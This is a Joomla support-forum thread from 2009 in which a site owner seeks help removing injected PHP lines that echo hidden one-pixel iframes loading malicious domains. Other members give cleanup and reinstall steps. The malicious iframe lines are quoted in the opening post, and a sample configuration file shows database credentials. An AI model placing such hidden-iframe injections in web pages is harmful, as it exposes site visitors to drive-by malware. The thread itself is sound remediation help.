-
AuthorPosts
-
GeoVi Friend
GeoVi
- Join date:
- January 2009
- Posts:
- 278
- Downloads:
- 4
- Uploads:
- 17
- Thanks:
- 226
- Thanked:
- 8 times in 1 posts
May 10, 2009 at 12:32 am #141037Hello,
I’m really bothered by having to search each module, component and administration files default.php for the following bug:
echo “<iframe src=”http://vafuiek.com/?click=81F01A” width=1 height=1 style=”visibility:hidden;position:absolute”></iframe>”;
echo “<iframe src=”http://clifedo.net/?click=51891D” width=1 height=1 style=”visibility:hidden;position:absolute”></iframe>”;
It seems to be everywhere. Is there an easy fix? It’s in my backups, too, no doubt. Do I crash the sties and start over building them? I’m using J1.5.10 on both sites that were hacked. I’ve changed passwords in FTP and My SQL and admin site info but I’m still finding this rubbish the deeper I search. Is there another way?
I’d appreciate your help very much. Thanks!
Miffed and wornout,
GeoVi –but still grateful, the sites are still up and running but I’m getting weird error messages, make a check and sure enough that rubbish is the culprit.
PLEASE HELP!!:((
1 user says Thank You to GeoVi for this useful post
Arvind Chauhan ModeratorArvind Chauhan
- Join date:
- September 2014
- Posts:
- 3835
- Downloads:
- 74
- Uploads:
- 92
- Thanks:
- 1240
- Thanked:
- 1334 times in 848 posts
May 10, 2009 at 5:42 am #304175Hi GeoVi,
Sad that your site got hacked, the inserted site url in your pages is a confirmed attack site.
Here is what you can try to remove the code from your pages :
1. Download your complete site backup on your computer. Unzip into a folder.
2. Downoad Windows Grep from here http://www.wingrep.com and install it.
3. On the folder right click >>Windows Grep >> Put the complete length of above URL code (hacker inserted), select *.* in file types, click search and Finish.4. If your input is correct it will display the list of files containing the above code.
5. Look at the top menu of windows grep >> use the second torch Icon (with text A>B). To replace the above code. Just leave the field empty and it will override the code with blank space.Hope that helps
Regards
arvind
1 user says Thank You to Arvind Chauhan for this useful post
nguyenhuu quang Friendnguyenhuu quang
- Join date:
- September 2014
- Posts:
- 1087
- Downloads:
- 0
- Uploads:
- 3
- Thanks:
- 29
- Thanked:
- 328 times in 288 posts
May 10, 2009 at 9:19 am #304189hi, Your site no hacked.
It is malware , i think from your PC, I have fixed alot of site with this malware or virus.
all Index.php. index.html , defaul.php
add: your iframe and / OR <javascript>hjfhsh fsdhfkj</javascript>
flow me:
1. clean your PC fisrt.
2. download fresh lastest joomla version.
3. download lastest your 3rd extensions
4. On your host creat new DIr: example: Yoursite.com/new
5, Upload and install new Joomla with all extensions (same Old verson at root)
6. edit Your configuraion.php to Your Old database.
7. Move all Images (omly images files, not Index.html) from Root to New Dir.
That’S all3 users say Thank You to nguyenhuu quang for this useful post
GeoVi FriendGeoVi
- Join date:
- January 2009
- Posts:
- 278
- Downloads:
- 4
- Uploads:
- 17
- Thanks:
- 226
- Thanked:
- 8 times in 1 posts
May 10, 2009 at 11:26 pm #304254<em>@drarvindc 128040 wrote:</em><blockquote>Hi GeoVi,
Sad that your site got hacked, the inserted site url in your pages is a confirmed attack site.
Here is what you can try to remove the code from your pages :
1. Download your complete site backup on your computer. Unzip into a folder.
2. Downoad Windows Grep from here http://www.wingrep.com and install it.
3. On the folder right click >>Windows Grep >> Put the complete length of above URL code (hacker inserted), select *.* in file types, click search and Finish.4. If your input is correct it will display the list of files containing the above code.
5. Look at the top menu of windows grep >> use the second torch Icon (with text A>B). To replace the above code. Just leave the field empty and it will override the code with blank space.Hope that helps
Regards
arvind</blockquote>
Hi arvind,
Thank you very much for responding and showing you care. I will attempt this and pray that it works. I may come back to get verification of a step. I’m a novice at this.
Kindest regards,
GeoViGeoVi FriendGeoVi
- Join date:
- January 2009
- Posts:
- 278
- Downloads:
- 4
- Uploads:
- 17
- Thanks:
- 226
- Thanked:
- 8 times in 1 posts
May 10, 2009 at 11:33 pm #304255<em>@quang268 128057 wrote:</em><blockquote>hi, Your site no hacked.
It is malware , i think from your PC, I have fixed alot of site with this malware or virus.
all Index.php. index.html , defaul.php
add: your iframe and / OR <javascript>hjfhsh fsdhfkj</javascript>
flow me:
1. clean your PC fisrt.
2. download fresh lastest joomla version.
3. download lastest your 3rd extensions
4. On your host creat new DIr: example: Yoursite.com/new
5, Upload and install new Joomla with all extensions (same Old verson at root)
6. edit Your configuraion.php to Your Old database.
7. Move all Images (omly images files, not Index.html) from Root to New Dir.
That’S all</blockquote>Quang,
Thanks again for replying to one of my threads. You said before it wasn’t a hack but malware. I believe I know the difference. I will try what arvind suggested in the first post – first. Then I’ll do what you’ve suggested. I hope something works.
Kind regards,
GeoViPS I am not sure how to do step 6 and may have to ask at a later time. Also in step 5, when you say upload and install new Joomla with all extensions, am I uploading OVER the old version? Do I just “overwrite all” when asked?
Now that I understand this, I may do this first..What I do not understand is Norton Antivirus doesn’t show a bug/virus.
GeoVi FriendGeoVi
- Join date:
- January 2009
- Posts:
- 278
- Downloads:
- 4
- Uploads:
- 17
- Thanks:
- 226
- Thanked:
- 8 times in 1 posts
May 11, 2009 at 9:07 pm #304376<em>@drarvindc 128040 wrote:</em><blockquote>Hi GeoVi,
Sad that your site got hacked, the inserted site url in your pages is a confirmed attack site.
Here is what you can try to remove the code from your pages :
1. Download your complete site backup on your computer. Unzip into a folder.
2. Downoad Windows Grep from here http://www.wingrep.com and install it.
3. On the folder right click >>Windows Grep >> Put the complete length of above URL code (hacker inserted), select *.* in file types, click search and Finish.4. If your input is correct it will display the list of files containing the above code.
5. Look at the top menu of windows grep >> use the second torch Icon (with text A>B). To replace the above code. Just leave the field empty and it will override the code with blank space.Hope that helps
Regards
arvind</blockquote>
Hi arvind,
I downloaded/installed Windows Grep. It does not recognize this extension. I don’t know what to do. I do not understand Step 3. Can you provide more clarification, please?
Thank you,
GeoVinguyenhuu quang Friendnguyenhuu quang
- Join date:
- September 2014
- Posts:
- 1087
- Downloads:
- 0
- Uploads:
- 3
- Thanks:
- 29
- Thanked:
- 328 times in 288 posts
May 12, 2009 at 12:43 am #304391I think My Ways is Best. I have fixed alots of site with same problem.
2 users say Thank You to nguyenhuu quang for this useful post
GeoVi FriendGeoVi
- Join date:
- January 2009
- Posts:
- 278
- Downloads:
- 4
- Uploads:
- 17
- Thanks:
- 226
- Thanked:
- 8 times in 1 posts
May 12, 2009 at 12:51 am #304392<em>@quang268 128311 wrote:</em><blockquote>I think My Ways is Best. I have fixed alots of site with same problem.</blockquote>
Okay, I’ll try your way first.
I’ve run Norton and it shows nothing. You said to clean my pc first. Since Norton shows nothing, am I to assume then my PC is clean and proceed? I have 3 sites that are infected! I am so annoyed by this.
Thanks.
GeoVi FriendGeoVi
- Join date:
- January 2009
- Posts:
- 278
- Downloads:
- 4
- Uploads:
- 17
- Thanks:
- 226
- Thanked:
- 8 times in 1 posts
May 24, 2009 at 12:42 am #305687<em>@quang268 128057 wrote:</em><blockquote>hi, Your site no hacked.
It is malware , i think from your PC, I have fixed alot of site with this malware or virus.
all Index.php. index.html , defaul.php
add: your iframe and / OR <javascript>hjfhsh fsdhfkj</javascript>
flow me:
1. clean your PC fisrt.
2. download fresh lastest joomla version.
3. download lastest your 3rd extensions
4. On your host creat new DIr: example: Yoursite.com/new
5, Upload and install new Joomla with all extensions (same Old verson at root)
6. edit Your configuraion.php to Your Old database.
7. Move all Images (omly images files, not Index.html) from Root to New Dir.
That’S all</blockquote>Quang,
What a beautiful baby!!! *warm smile*
I have been busy. I am forced to take care of site now because Google and FireFox says it is dangerous for site visitors with a bad message when going to it.
I have done these things:
1. 2. 3. 4. 5. 7.Now I am unsure about #6. I have questions, please. I do not know what I am doing but trying to understand so please be patient.
1. Will I have to retype the content articles etc. to the new site or is there a way to transfer them to the new site.
2. When you say edit configuration.php to my old database, what do you mean?
3. Will I delete the iinfected site in the root and move the new site from the subdirectory to the new site when everything is done?Thank you for your help. I believe this is the best answer.
Kindest regards,
GeoVinguyenhuu quang Friendnguyenhuu quang
- Join date:
- September 2014
- Posts:
- 1087
- Downloads:
- 0
- Uploads:
- 3
- Thanks:
- 29
- Thanked:
- 328 times in 288 posts
May 24, 2009 at 12:51 am #305688ok. if you move new site to root. so upload again configuration.php. no problem.
because:
example:
var $tmp_path = 'C:\AppServ\www\Joomla_1.5.9\tmp';
var $log_path = 'C:\AppServ\www\Joomla_1.5.9\logs';
if you on new dir like that:
var$tmp_path = 'C:\AppServ\www\Joomla_1.5.9newtmp';
var $log_path = 'C:\AppServ\www\Joomla_1.5.9newlogs';
so when you move to root, need to edit it
Thanks1 user says Thank You to nguyenhuu quang for this useful post
GeoVi FriendGeoVi
- Join date:
- January 2009
- Posts:
- 278
- Downloads:
- 4
- Uploads:
- 17
- Thanks:
- 226
- Thanked:
- 8 times in 1 posts
May 24, 2009 at 1:31 am #305701<em>@quang268 129949 wrote:</em><blockquote>ok. if you move new site to root. so upload again configuration.php. no problem.
because:
example:var $tmp_path = 'C:\AppServ\www\Joomla_1.5.9\tmp';
var $log_path = 'C:\AppServ\www\Joomla_1.5.9\logs';if you on new dir like that:
var$tmp_path = 'C:\AppServ\www\Joomla_1.5.9newtmp';
var $log_path = 'C:\AppServ\www\Joomla_1.5.9newlogs';so when you move to root, need to edit it
Thanks</blockquote>Thank you very much for quick reply but I do not fully understand.
How do I move articles and content from old site to new site? Do I copy and paste them? Am I rebuilding the site? If I must, I will but if there is a way to avoid it, I would like to know, please.
nguyenhuu quang Friendnguyenhuu quang
- Join date:
- September 2014
- Posts:
- 1087
- Downloads:
- 0
- Uploads:
- 3
- Thanks:
- 29
- Thanked:
- 328 times in 288 posts
May 24, 2009 at 1:51 am #305702open your configuration.php and you can see like that
var $dbtype = 'mysql';
var $host = 'localhost';
var $user = 'root';
var $password = 'thanhlam';
var $db = 'joomla159';
var $dbprefix = 'jos_';
and change it to Old database
or, if you still to keep old configuration.php.
pls rename new configuration.php and upload old configuration.php to your host1 user says Thank You to nguyenhuu quang for this useful post
GeoVi FriendGeoVi
- Join date:
- January 2009
- Posts:
- 278
- Downloads:
- 4
- Uploads:
- 17
- Thanks:
- 226
- Thanked:
- 8 times in 1 posts
May 24, 2009 at 2:42 am #305705<em>@quang268 129963 wrote:</em><blockquote>open your configuration.php and you can see like that
var $dbtype = 'mysql';
var $host = 'localhost';
var $user = 'root';
var $password = 'thanhlam';
var $db = 'joomla159';
var $dbprefix = 'jos_';and change it to Old database
or, if you still to keep old configuration.php.
pls rename new configuration.php and upload old configuration.php to your host</blockquote>I think I got it now! Thank you!! You have been very patient with me and I am forever grateful. *gracefully bowing*
Big smile! 😀
GeoVi
nguyenhuu quang Friendnguyenhuu quang
- Join date:
- September 2014
- Posts:
- 1087
- Downloads:
- 0
- Uploads:
- 3
- Thanks:
- 29
- Thanked:
- 328 times in 288 posts
GeoVi FriendGeoVi
- Join date:
- January 2009
- Posts:
- 278
- Downloads:
- 4
- Uploads:
- 17
- Thanks:
- 226
- Thanked:
- 8 times in 1 posts
May 24, 2009 at 3:08 am #305711<em>@quang268 129967 wrote:</em><blockquote>n problem Goevi, sory for my bad english so sometime not clear.
Thanks
do you have skype or YM other chat software pls contact me'</blockquote>Quang, it is not your English. It is me not understanding how MySQL works and other tech issues. I just want to have a site that works but there is more involved. Your English is better than my Vietnamese. :laugh: You do very well with English.
I am trying to reach you on Skype now. 🙂
-
AuthorPosts
This topic contains 19 replies, has 5 voices, and was last updated by nguyenhuu quang 15 years, 6 months ago.
We moved to new unified forum. Please post all new support queries in our New Forum